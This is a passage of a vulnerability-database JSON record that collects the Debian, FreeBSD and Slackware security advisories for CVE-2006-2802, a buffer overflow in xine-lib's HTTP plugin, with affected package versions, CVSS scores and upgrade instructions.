GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3.diff", "arch": "src", "packageFilename": "xine-lib_1.0.1-1sarge3.diff.gz", "packageName": "xine-lib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "m68k", "packageFilename": "libxine0_0.9.8-2woody5_m68k.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "mipsel", "packageFilename": "libxine1_1.0.1-1sarge3_mipsel.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "sparc", "packageFilename": "libxine0_0.9.8-2woody5_sparc.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "alpha", "packageFilename": "libxine-dev_1.0.1-1sarge3_alpha.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "m68k", "packageFilename": "libxine1_1.0.1-1sarge3_m68k.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "s390x", "packageFilename": "libxine-dev_1.0.1-1sarge3_s390.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "i686", "packageFilename": "libxine1_1.0.1-1sarge3_i386.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "x86-64", "packageFilename": "libxine-dev_1.0.1-1sarge3_amd64.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "ia64", "packageFilename": "libxine-dev_1.0.1-1sarge3_ia64.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "sparc", "packageFilename": "libxine1_1.0.1-1sarge3_sparc.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "mipsel", "packageFilename": "libxine0_0.9.8-2woody5_mipsel.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "ia64", "packageFilename": "libxine0_0.9.8-2woody5_ia64.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "sparc", "packageFilename": "libxine-dev_1.0.1-1sarge3_sparc.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "x86-64", "packageFilename": "libxine1_1.0.1-1sarge3_amd64.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "src", "packageFilename": "xine-lib_0.9.8-2woody5.dsc", "packageName": "xine-lib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "arm", "packageFilename": "libxine1_1.0.1-1sarge3_arm.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "i686", "packageFilename": "libxine-dev_1.0.1-1sarge3_i386.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "arm", "packageFilename": "libxine-dev_0.9.8-2woody5_arm.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "mips", "packageFilename": "libxine0_0.9.8-2woody5_mips.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "ppc", "packageFilename": "libxine-dev_0.9.8-2woody5_powerpc.deb", "packageName": "libxine-dev", "operator": "lt"}], "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP Plugin in xine-lib, the xine video/media player library, that could allow a remote attacker to cause a denial of service.\n\nFor the old stable distribution (woody) this problem has been fixed in version 0.9.8-2woody5.\n\nFor the stable distribution (sarge) this problem has been fixed in version 1.0.1-1sarge3.\n\nFor the unstable distribution (sid) this problem has been fixed in version 1.1.1-2.\n\nWe recommend that you upgrade your libxine packages.", "edition": 1, "reporter": "Debian", "published": "2006-07-07T00:00:00", "title": "xine-lib -- buffer overflow", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2802"], "modified": "2006-07-07T00:00:00", "id": "DSA-1105", "href": "http://www.debian.org/security/dsa-1105", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:48", "references": ["http://secunia.com/advisories/20369"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.1.1_6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxine", "operator": "lt"}], "description": "\nA Secunia Advisory reports:\n\nFederico L. Bossi Bonin has discovered a weakness in xine-lib,\n\t which can be exploited by malicious people to crash certain\n\t applications on a user's system.\nThe weakness is cause due to a heap corruption within the\n\t \"xineplug_inp_http.so\" plugin when handling an overly large\n\t reply from the HTTP server. This can be exploited to crash\n\t an application that uses the plugin (e.g. gxine).\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2006-05-31T00:00:00", "title": "libxine -- buffer overflow vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-2802"], "modified": "2006-05-31T00:00:00", "id": "107E2EE5-F941-11DA-B1FA-020039488E34", "href": "https://vuxml.freebsd.org/freebsd/107e2ee5-f941-11da-b1fa-020039488e34.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:41", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "10.2", "packageVersion": "1.1.2", "arch": "i686", "packageFilename": "xine-lib-1.1.2-i686-1.tgz", "packageName": "xine-lib", "operator": "lt"}], "description": "New xine-lib packages are available for Slackware 10.2 and -current to\nfix security issues.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2802\n\nEvidently there is also an issue involving AVI files which has not\nbeen issued a CVE entry.\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/xine-lib-1.1.2-i686-1.tgz:\n Upgraded to xine-lib-1.1.2.\n According to xinehq.de's announcement:\n There are three security fixes:\n - CVE-2005-4048: possible buffer overflow in libavcodec (crafted PNGs);\n - CVE-2006-2802: possible buffer overflow in the HTTP plugin;\n - possible buffer overflow via bad indexes in specially-crafted AVI files.\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/xine-lib-1.1.2-i686-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xine-lib-1.1.2-i686-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\nd5d3dcd06fd6cc4f68d2a4717f507f21 xine-lib-1.1.2-i686-1.tgz\n\nSlackware -current package:\na82c9b20ccaec12f770cc1e4f63511d7 xine-lib-1.1.2-i686-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg xine-lib-1.1.2-i686-1.tgz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2006-07-26T14:25:49", "title": "xine-lib", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-2802", "CVE-2005-4048"], "modified": "2006-07-26T14:25:49", "id": "SSA-2006-207-04", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.391759", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}